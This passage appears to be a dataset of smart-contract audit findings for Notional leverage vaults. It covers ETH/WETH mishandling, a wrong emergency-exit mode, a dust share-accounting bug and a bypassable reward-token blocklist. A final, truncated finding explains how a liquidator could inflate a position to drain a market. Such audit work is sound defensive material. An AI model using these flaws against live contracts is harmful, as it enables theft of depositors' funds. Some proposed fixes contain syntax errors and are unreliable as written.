In this case, the condition will be evaluated to be true, and a revert will occur. As a result, the protocol would not be able to reinvest such reward tokens.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\nчConsider tracking the number of pool tokens received during an emergency exit, and segregate these tokens with the reward tokens. For instance, the vault has 3000 CVX, 1000 of them are received during the emergency exit, while the rest are reward tokens emitted from Convex/Aura. In this case, the protocol can sell all CVX on the vault except for the 1000 CVX reserved.чThe reinvestment of reward tokens is a critical component of the vault. The value per vault share increases when reward tokens are sold for the pool tokens and reinvested back into the Curve/Balancer pool to obtain more LP tokens. 
If this feature does not work as intended, it will lead to a loss of assets for the vault shareholders.ч```\\nFile: SingleSidedLPVaultBase.sol\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n```\\n -Native ETH not received when removing liquidity from Curve V2 poolsчhighчNative ETH was not received when removing liquidity from Curve V2 pools due to the mishandling of Native ETH and WETH, leading to a loss of assets.\\nCurve V2 pool will always wrap to WETH and send to leverage vault unless the `use_eth` is explicitly set to `True`. Otherwise, it will default to `False`. The following implementation of the `remove_liquidity_one_coin` function taken from one of the Curve V2 pools shows that unless the `use_eth` is set to `True`, the `WETH.deposit()` will be triggered to wrap the ETH, and WETH will be transferred back to the caller. 
The same is true for the `remove_liquidity` function, but it is omitted for brevity.\\n```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256,\\n use_eth: bool = False, receiver: address = msg.sender) -> uint256:\\n A_gamma: uint256[2] = self._A_gamma()\\n\\n dy: uint256 = 0\\n D: uint256 = 0\\n p: uint256 = 0\\n xp: uint256[N_COINS] = empty(uint256[N_COINS])\\n future_A_gamma_time: uint256 = self.future_A_gamma_time\\n dy, p, D, xp = self._calc_withdraw_one_coin(A_gamma, token_amount, i, (future_A_gamma_time > 0), True)\\n assert dy >= min_amount, \"Slippage\"\\n\\n if block.timestamp >= future_A_gamma_time:\\n self.future_A_gamma_time = 1\\n\\n self.balances[i] -= dy\\n CurveToken(self.token).burnFrom(msg.sender, token_amount)\\n\\n coin: address = self.coins[i]\\n if use_eth and coin == WETH20:\\n raw_call(receiver, b\"\", value=dy)\\n else:\\n if coin == WETH20:\\n WETH(WETH20).deposit(value=dy)\\n response: Bytes[32] = raw_call(\\n coin,\\n _abi_encode(receiver, dy, method_id=method_id(\"transfer(address,uint256)\")),\\n max_outsize=32,\\n )\\n if len(response) != 0:\\n assert convert(response, bool)\\n```\\n\\nNotional's Leverage Vault only works with Native ETH. It was found that the `remove_liquidity_one_coin` and `remove_liquidity` functions are executed without explicitly setting the `use_eth` parameter to `True`. Thus, WETH instead of Native ETH will be returned during remove liquidity. 
As a result, these WETH will not be accounted for in the vault and result in a loss of assets.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function _unstakeAndExitPool(\\n..SNIP..\\n ICurve2TokenPool pool = ICurve2TokenPool(CURVE_POOL);\\n exitBalances = new uint256[](2);\\n if (isSingleSided) {\\n // Redeem single-sided\\n exitBalances[_PRIMARY_INDEX] = pool.remove_liquidity_one_coin(\\n poolClaim, int8(_PRIMARY_INDEX), _minAmounts[_PRIMARY_INDEX]\\n );\\n } else {\\n // Redeem proportionally, min amounts are rewritten to a fixed length array\\n uint256[2] memory minAmounts;\\n minAmounts[0] = _minAmounts[0];\\n minAmounts[1] = _minAmounts[1];\\n\\n uint256[2] memory _exitBalances = pool.remove_liquidity(poolClaim, minAmounts);\\n exitBalances[0] = _exitBalances[0];\\n exitBalances[1] = _exitBalances[1];\\n }\\n```\\nчIf one of the pool tokens is ETH, consider setting `is_eth` to true when calling `remove_liquidity_one_coin` and `remove_liquidity` functions to ensure that Native ETH is sent back to the vault.чFollowing are some of the impacts due to the mishandling of Native ETH and WETH during liquidity removal in Curve pools, leading to loss of assets:\\nWithin the `redeemFromNotional`, if the vaults consist of ETH, the `_UNDERLYING_IS_ETH` will be set to true. In this case, the code will attempt to call `transfer` to `transfer` Native ETH, which will fail as Native ETH is not received and users/Notional are unable to redeem.\\n`File: BaseStrategyVault.sol\\n175: function redeemFromNotional(\\n..SNIP..\\n199: if (_UNDERLYING_IS_ETH) {\\n200: if (transferToReceiver > 0) payable(receiver).transfer(transferToReceiver);\\n201: if (transferToNotional > 0) payable(address(NOTIONAL)).transfer(transferToNotional);\\n202: } else {\\n..SNIP..`\\nWETH will be received instead of Native ETH during the emergency exit. During vault restoration, WETH is not re-entered into the pool as only Native ETH residing in the vault will be transferred to the pool. 
Leverage vault only works with Native ETH, and if one of the pool tokens is WETH, it will be converted to Native ETH (0x0 or 0xEeeee) during deployment/initialization. Thus, the WETH is stuck in the vault. This causes the value per share to drop significantly. (Reference)\\n`File: SingleSidedLPVaultBase.sol\\n480: function emergencyExit(\\n481: uint256 claimToExit, bytes calldata /* data */\\n482: ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n483: StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n484: if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n485: \\n486: // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n487: // in a proportional exit. Front running will not have an effect since no trading will\\n488: // occur during a proportional exit.\\n489: _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n490: \\n491: state.totalPoolClaim = state.totalPoolClaim - claimToExit;\\n492: state.setStrategyVaultState();`ч```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256,\\n use_eth: bool = False, receiver: address = msg.sender) -> uint256:\\n A_gamma: uint256[2] = self._A_gamma()\\n\\n dy: uint256 = 0\\n D: uint256 = 0\\n p: uint256 = 0\\n xp: uint256[N_COINS] = empty(uint256[N_COINS])\\n future_A_gamma_time: uint256 = self.future_A_gamma_time\\n dy, p, D, xp = self._calc_withdraw_one_coin(A_gamma, token_amount, i, (future_A_gamma_time > 0), True)\\n assert dy >= min_amount, \"Slippage\"\\n\\n if block.timestamp >= future_A_gamma_time:\\n self.future_A_gamma_time = 1\\n\\n self.balances[i] -= dy\\n CurveToken(self.token).burnFrom(msg.sender, token_amount)\\n\\n coin: address = self.coins[i]\\n if use_eth and coin == WETH20:\\n raw_call(receiver, b\"\", value=dy)\\n else:\\n if coin == WETH20:\\n WETH(WETH20).deposit(value=dy)\\n response: Bytes[32] = raw_call(\\n coin,\\n _abi_encode(receiver, dy, 
method_id=method_id(\"transfer(address,uint256)\")),\\n max_outsize=32,\\n )\\n if len(response) != 0:\\n assert convert(response, bool)\\n```\\n -Single-sided instead of proportional exit is performed during emergency exitчhighчSingle-sided instead of proportional exit is performed during emergency exit, which could lead to a loss of assets during emergency exit and vault restoration.\\nPer the comment in Line 476 below, the BPT should be redeemed proportionally to underlying tokens during an emergency exit. However, it was found that the `_unstakeAndExitPool` function is executed with the `isSingleSided` parameter set to `true`.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Allows the emergency exit role to trigger an emergency exit on the vault.\\n /// In this situation, the `claimToExit` is withdrawn proportionally to the underlying\\n /// tokens and held on the vault. The vault is locked so that no entries, exits or\\n /// valuations of vaultShares can be performed.\\n /// @param claimToExit if this is set to zero, the entire pool claim is withdrawn\\n function emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n\\n // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n // in a proportional exit. Front running will not have an effect since no trading will\\n // occur during a proportional exit.\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n```\\n\\nIf the `isSingleSided` is set to `True`, the `EXACT_BPT_IN_FOR_ONE_TOKEN_OUT` will be used, which is incorrect. 
Per the Balancer's documentation, `EXACT_BPT_IN_FOR_ONE_TOKEN_OUT` is a single asset exit where the user sends a precise quantity of BPT, and receives an estimated but unknown (computed at run time) quantity of a single token.\\nTo perform a proportional exit, the `EXACT_BPT_IN_FOR_TOKENS_OUT` should be used instead.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _unstakeAndExitPool(\\n uint256 poolClaim, uint256[] memory minAmounts, bool isSingleSided\\n ) internal override returns (uint256[] memory exitBalances) {\\n bool success = AURA_REWARD_POOL.withdrawAndUnwrap(poolClaim, false); // claimRewards = false\\n require(success);\\n\\n bytes memory customData;\\n if (isSingleSided) {\\n..SNIP..\\n uint256 primaryIndex = PRIMARY_INDEX();\\n customData = abi.encode(\\n IBalancerVault.ComposableExitKind.EXACT_BPT_IN_FOR_ONE_TOKEN_OUT,\\n poolClaim,\\n primaryIndex < BPT_INDEX ? primaryIndex : primaryIndex - 1\\n );\\n```\\n\\nThe same issue affects the Curve's implementation of the `_unstakeAndExitPool` function.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function _unstakeAndExitPool(\\n uint256 poolClaim, uint256[] memory _minAmounts, bool isSingleSided\\n ) internal override returns (uint256[] memory exitBalances) {\\n..SNIP..\\n ICurve2TokenPool pool = ICurve2TokenPool(CURVE_POOL);\\n exitBalances = new uint256[](2);\\n if (isSingleSided) {\\n // Redeem single-sided\\n exitBalances[_PRIMARY_INDEX] = pool.remove_liquidity_one_coin(\\n poolClaim, int8(_PRIMARY_INDEX), _minAmounts[_PRIMARY_INDEX]\\n );\\n```\\nчSet the `isSingleSided` parameter to `false` when calling the `_unstakeAndExitPool` function to ensure that the proportional exit is performed.\\n```\\nfunction emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n ..SNIP..\\n// Remove the line 
below\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n// Add the line below\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), false);\\n```\\nчThe following are some of the impacts of this issue, which lead to loss of assets:\\nRedeeming LP tokens one-sided incurs unnecessary slippage as tokens have to be swapped internally to one specific token within the pool, resulting in fewer assets received.\\nPer the source code comment below, in other words, unless a proportional exit is performed, the emergency exit will be subjected to front-run attack and slippage.\\n`File: SingleSidedLPVaultBase.sol\\n486: // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n487: // in a proportional exit. Front running will not have an effect since no trading will\\n488: // occur during a proportional exit.\\n489: _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);`\\nAfter the emergency exit, the vault only held one of the pool tokens. To re-enter the pool, the vault has to either swap the token to other pool tokens on external DEXs to maintain the proportion or perform a single-sided join. Both of these methods will incur unnecessary slippage, resulting in fewer LP tokens received at the end.ч```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Allows the emergency exit role to trigger an emergency exit on the vault.\\n /// In this situation, the `claimToExit` is withdrawn proportionally to the underlying\\n /// tokens and held on the vault. 
The vault is locked so that no entries, exits or\\n /// valuations of vaultShares can be performed.\\n /// @param claimToExit if this is set to zero, the entire pool claim is withdrawn\\n function emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n\\n // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n // in a proportional exit. Front running will not have an effect since no trading will\\n // occur during a proportional exit.\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n```\\n -reinvestReward() generates dust totalPoolClaim causing vault abnormalчmediumчIf the first user deposits too small an amount, due to the round down, it may result in 0 shares, which will result in 0 shares no matter how much is deposited later. In `Notional`, this situation will be prevented by setting `a minimum borrow size and a minimum leverage ratio`. 
However, `reinvestReward()` does not have this restriction, which may cause this problem to still exist, causing the vault to enter an abnormal state.\\nThe calculation of the shares of the vault is as follows:\\n```\\n function _mintVaultShares(uint256 lpTokens) internal returns (uint256 vaultShares) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (state.totalPoolClaim == 0) {\\n // Vault Shares are in 8 decimal precision\\n vaultShares = (lpTokens * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / POOL_PRECISION();\\n } else {\\n vaultShares = (lpTokens * state.totalVaultSharesGlobal) / state.totalPoolClaim;\\n }\\n\\n // Updates internal storage here\\n state.totalPoolClaim += lpTokens;\\n state.totalVaultSharesGlobal += vaultShares.toUint80();\\n state.setStrategyVaultState();\\n```\\n\\nIf the first `deposit` is too small, due to the conversion to `INTERNAL_TOKEN_PRECISION`, the precision is lost, resulting in `vaultShares=0`. Subsequent depositors will enter the second calculation, but `totalVaultSharesGlobal=0`, so `vaultShares` will always be `0`.\\nTo avoid this situation, `Notional` has restrictions.\\nhey guys, just to clarify some rounding issues stuff on vault shares and the precision loss. Notional will enforce a minimum borrow size and a minimum leverage ratio on users which will essentially force their initial deposits to be in excess of any dust amount. so we should not really see any tiny deposits that result in rounding down to zero vault shares. If there was rounding down to zero, the account will likely fail their collateral check as the vault shares act as collateral and the would have none. there is the possibility of a dust amount entering into depositFromNotional in a valid state, that would be due to an account \"rolling\" a position from one debt maturity to another. 
in this case, a small excess amount of deposit may come into the vault but the account would still be forced to be holding a sizeable position overall due to the minimum borrow size.\\nIn `reinvestReward()`, there is no such limit\\n```\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n\\n poolClaimAmount = _joinPoolAndStake(amounts, minPoolClaim);\\n\\n // Increase LP token amount without minting additional vault shares\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n state.totalPoolClaim += poolClaimAmount;\\n state.setStrategyVaultState();\\n\\n emit RewardReinvested(rewardToken, amountSold, poolClaimAmount);\\n }\\n```\\n\\nFrom the above code, we know that `reinvestReward()` will increase `totalPoolClaim`, but will not increase `totalVaultSharesGlobal`.\\nThis will cause problems in the following scenarios:\\nThe current vault has deposits.\\n`Rewards` have been generated, but `reinvestReward()` has not been executed.\\nThe `bot` submitted the `reinvestReward()` transaction. 
but step 4 executes first\\nThe users took away all the deposits `totalPoolClaim = 0`, `totalVaultSharesGlobal=0`.\\nAt this time `reinvestReward()` is executed, then `totalPoolClaim > 0`, `totalVaultSharesGlobal=0`.\\nOther users' deposits will fail later.\\nIt is recommended that `reinvestReward()` add a judgment of `totalVaultSharesGlobal>0`.\\nNote: If there is a malicious REWARD_REINVESTMENT_ROLE, it can provoke this issue by donating reward token and triggering reinvestReward() before the first depositor appears.ч```\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. 
This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n\\n poolClaimAmount = _joinPoolAndStake(amounts, minPoolClaim);\\n\\n // Increase LP token amount without minting additional vault shares\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n// Add the line below\\n require(state.totalVaultSharesGlobal > 0 ,\"invalid shares\");\\n state.totalPoolClaim // Add the line below\\n= poolClaimAmount;\\n state.setStrategyVaultState();\\n\\n emit RewardReinvested(rewardToken, amountSold, poolClaimAmount);\\n }\\n```\\nчreinvestReward() generates dust totalPoolClaim causing vault abnormalч```\\n function _mintVaultShares(uint256 lpTokens) internal returns (uint256 vaultShares) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (state.totalPoolClaim == 0) {\\n // Vault Shares are in 8 decimal precision\\n vaultShares = (lpTokens * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / POOL_PRECISION();\\n } else {\\n vaultShares = (lpTokens * state.totalVaultSharesGlobal) / state.totalPoolClaim;\\n }\\n\\n // Updates internal storage here\\n state.totalPoolClaim += lpTokens;\\n state.totalVaultSharesGlobal += vaultShares.toUint80();\\n state.setStrategyVaultState();\\n```\\n -ETH can be sold during reinvestmentчmediumчThe existing control to prevent ETH from being sold during reinvestment can be bypassed, allowing the bots to accidentally or maliciously sell off the non-reward assets of the vault.\\nMultiple instances of this issue were found:\\nInstance 1 - Curve's Implementation\\nThe `_isInvalidRewardToken` function attempts to prevent the callers from selling away ETH during reinvestment.\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 
||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n\\nHowever, the code at Line 67 above will not achieve the intended outcome as `Deployments.ALT_ETH_ADDRESS` is not a valid token address in the first place.\\n```\\naddress internal constant ALT_ETH_ADDRESS = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n```\\n\\nWhen the caller is executing a trade with ETH, the address for ETH used is either `Deployments.WETH` or `Deployments.ETH_ADDRESS` (address(0)) as shown in the TradingUtils's source code, not the `Deployments.ALT_ETH_ADDRESS`.\\n```\\nFile: TradingUtils.sol\\n function _executeTrade(\\n address target,\\n uint256 msgValue,\\n bytes memory params,\\n address spender,\\n Trade memory trade\\n ) private {\\n uint256 preTradeBalance;\\n \\n if (trade.buyToken == address(Deployments.WETH)) {\\n preTradeBalance = address(this).balance;\\n } else if (trade.buyToken == Deployments.ETH_ADDRESS || _needsToUnwrapExcessWETH(trade, spender)) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n }\\n```\\n\\nAs a result, the caller (bot) of the reinvestment function could still sell off the ETH from the vault, bypassing the requirement.\\nInstance 2 - Balancer's Implementation\\nWhen the caller is executing a trade with ETH, the address for ETH used is either `Deployments.WETH` or `Deployments.ETH_ADDRESS` (address(0)), as mentioned earlier. 
However, the `AuraStakingMixin._isInvalidRewardToken` function only blocks `Deployments.WETH` but not `Deployments.ETH`, thus allowing the caller (bot) of the reinvestment function, could still sell off the ETH from the vault, bypassing the requirement.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\nPer the sponsor's clarification below, the contracts should protect against the bot doing unintended things (including acting maliciously) due to coding errors, which is one of the main reasons for having the `_isInvalidRewardToken` function. Thus, this issue is a valid bug in the context of this audit contest.\\nчTo ensure that ETH cannot be sold off during reinvestment, consider the following changes:\\nCurve\\n```\\nFile: ConvexStakingMixin.sol\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n// Add the line below\\n token == Deployments.ETH ||\\n// Add the line below\\n token == Deployments.WETH ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n}\\n```\\n\\nBalancer\\n```\\nFile: AuraStakingMixin.sol\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n// Add the line below\\n token == address(Deployments.ETH) \\n token == address(Deployments.WETH)\\n );\\n}\\n```\\nчThe 
existing control to prevent ETH from being sold during reinvestment can be bypassed, allowing the bots to accidentally or maliciously sell off the non-reward assets of the vault.ч```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n -Leverage Vault on sidechains that support Curve V2 pools is brokenчmediumчNo users will be able to deposit to the Leverage Vault on Arbitrum and Optimism that supports Curve V2 pools, leading to the core contract functionality of a vault being broken and a loss of revenue for the protocol.\\nFollowing are examples of some Curve V2 pools in Arbitum:\\nThe code from Line 64 to Line 71 is only executed if the contract resides on Ethereum. As a result, for Arbitrum and Optimism sidechains, the `IS_CURVE_V2` variable is always false.\\n```\\nFile: Curve2TokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_,\\n DeploymentParams memory params\\n ) SingleSidedLPVaultBase(notional_, params.tradingModule) {\\n CURVE_POOL = params.pool;\\n\\n bool isCurveV2 = false;\\n if (Deployments.CHAIN_ID == Constants.CHAIN_ID_MAINNET) {\\n address[10] memory handlers = \\n Deployments.CURVE_META_REGISTRY.get_registry_handlers_from_pool(address(CURVE_POOL));\\n\\n require(\\n handlers[0] == Deployments.CURVE_V1_HANDLER ||\\n handlers[0] == Deployments.CURVE_V2_HANDLER\\n ); // @dev unknown Curve version\\n isCurveV2 = (handlers[0] == Deployments.CURVE_V2_HANDLER);\\n }\\n IS_CURVE_V2 = isCurveV2;\\n```\\n\\nAs a result, code within the `_joinPoolAndStake` function will always call the Curve V1's `add_liquidity` function that does not define the `use_eth` parameter.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function 
_joinPoolAndStake(\\n..SNIP..\\n // Slightly different method signatures in v1 and v2\\n if (IS_CURVE_V2) {\\n lpTokens = ICurve2TokenPoolV2(CURVE_POOL).add_liquidity{value: msgValue}(\\n amounts, minPoolClaim, 0 < msgValue // use_eth = true if msgValue > 0\\n );\\n } else {\\n lpTokens = ICurve2TokenPoolV1(CURVE_POOL).add_liquidity{value: msgValue}(\\n amounts, minPoolClaim\\n );\\n }\\n```\\n\\nIf the `use_eth` parameter is not defined, it will default to `False`. As a result, the Curve pool expects the caller to transfer over the WETH to the pool and the pool will call `WETH.withdraw` to unwrap the WETH to Native ETH as shown in the code below.\\nHowever, Notional's leverage vault only works with Native ETH, and if one of the pool tokens is WETH, it will explicitly convert the address to either the `Deployments.ALT_ETH_ADDRESS` (0xEeeee) or `Deployments.ETH_ADDRESS` (address(0)) during deployment and initialization.\\nThe implementation of the above `_joinPoolAndStake` function will forward Native ETH to the Curve Pool, while the pool expects the vault to transfer in WETH. As a result, a revert will occur since the pool did not receive the WETH it required during the unwrap process.\\n```\\ndef add_liquidity(\\n amounts: uint256[N_COINS],\\n min_mint_amount: uint256,\\n use_eth: bool = False,\\n receiver: address = msg.sender\\n) -> uint256:\\n \"\"\"\\n @notice Adds liquidity into the pool.\\n @param amounts Amounts of each coin to add.\\n @param min_mint_amount Minimum amount of LP to mint.\\n @param use_eth True if native token is being added to the pool.\\n @param receiver Address to send the LP tokens to. 
Default is msg.sender\\n @return uint256 Amount of LP tokens received by the `receiver\\n \"\"\"\\n..SNIP..\\n # --------------------- Get prices, balances -----------------------------\\n..SNIP..\\n # -------------------------------------- Update balances and calculate xp.\\n..SNIP// rest of code\\n # ---------------- transferFrom token into the pool ----------------------\\n\\n for i in range(N_COINS):\\n\\n if amounts[i] > 0:\\n\\n if coins[i] == WETH20:\\n\\n self._transfer_in(\\n coins[i],\\n amounts[i],\\n 0, # <-----------------------------------\\n msg.value, # | No callbacks\\n empty(address), # <----------------------| for\\n empty(bytes32), # <----------------------| add_liquidity.\\n msg.sender, # |\\n empty(address), # <-----------------------\\n use_eth\\n )\\n```\\n\\n```\\ndef _transfer_in(\\n..SNIP..\\n use_eth: bool\\n):\\n..SNIP..\\n @params use_eth True if the transfer is ETH, False otherwise.\\n \"\"\"\\n\\n if use_eth and _coin == WETH20:\\n assert mvalue == dx # dev: incorrect eth amount\\n else:\\n..SNIP..\\n if _coin == WETH20:\\n WETH(WETH20).withdraw(dx) # <--------- if WETH was transferred in\\n # previous step and `not use_eth`, withdraw WETH to ETH.\\n```\\nчEnsure the `IS_CURVE_V2` variable is initialized on the Arbitrum and Optimism side chains according to the Curve Pool's version.\\nIf there is a limitation on the existing approach to determining a pool is V1 or V2 on Arbitrum and Optimsim, an alternative approach might be to use the presence of a `gamma()` function as an indicator of pool typeчNo users will be able to deposit to the Leverage Vault on Arbitrum and Optimism that supports Curve V2 pools. The deposit function is a core function of any vault. 
Thus, this issue breaks the core contract functionality of a vault.\\nIn addition, if the affected vaults cannot be used, it leads to a loss of revenue for the protocol.ч```\\nFile: Curve2TokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_,\\n DeploymentParams memory params\\n ) SingleSidedLPVaultBase(notional_, params.tradingModule) {\\n CURVE_POOL = params.pool;\\n\\n bool isCurveV2 = false;\\n if (Deployments.CHAIN_ID == Constants.CHAIN_ID_MAINNET) {\\n address[10] memory handlers = \\n Deployments.CURVE_META_REGISTRY.get_registry_handlers_from_pool(address(CURVE_POOL));\\n\\n require(\\n handlers[0] == Deployments.CURVE_V1_HANDLER ||\\n handlers[0] == Deployments.CURVE_V2_HANDLER\\n ); // @dev unknown Curve version\\n isCurveV2 = (handlers[0] == Deployments.CURVE_V2_HANDLER);\\n }\\n IS_CURVE_V2 = isCurveV2;\\n```\\n -Liquidator can liquidate user while increasing user position to any value, stealing all Market funds or bricking the contractчhighчWhen a user is liquidated, there is a check to ensure that after liquidator order executes, `closable = 0`, but this actually doesn't prevent liquidator from increasing user position, and since all position size and collateral checks are skipped during liquidation, this allows malicious liquidator to open position of max possible size (2^62-1) during liquidation. Opening such huge position means the Market contract accounting is basically broken from this point without any ability to restore it. For example, the fee paid (and accumulated by makers) from opening such position will be higher than entire Market collateral balance, so any maker can withdraw full Market balance immediately after this position is settled.\\n`closable` is the value calculated as the maximum possible position size that can be closed even if some pending position updates are invalidated due to invalid oracle version. 
For example:\\nLatest position = 10\\nPending position [t=200] = 0\\nPending position [t=300] = 1000\\nIn such scenario `closable = 0` (regardless of position size at t=300).\\nWhen position is liquidated (called `protected` in the code), the following requirements are enforced in _invariant():\\n```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n\\nif (\\n !(context.currentPosition.local.magnitude().isZero() && context.latestPosition.local.magnitude().isZero()) && // sender has no position\\n !(newOrder.isEmpty() && collateral.gte(Fixed6Lib.ZERO)) && // sender is depositing zero or more into account, without position change\\n (context.currentTimestamp - context.latestVersion.timestamp >= context.riskParameter.staleAfter) // price is not stale\\n) revert MarketStalePriceError();\\n\\nif (context.marketParameter.closed && newOrder.increasesPosition())\\n revert MarketClosedError();\\n\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n\\nif (!newOrder.singleSided(context.currentPosition.local) || !newOrder.singleSided(context.latestPosition.local))\\n revert MarketNotSingleSidedError();\\n\\nif (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n```\\n\\nThe requirements for liquidated positions are:\\nclosable = 0, user position collateral is below maintenance, liquidator withdraws no more than liquidation fee\\nmarket oracle price is not stale\\nfor closed market - order doesn't increase 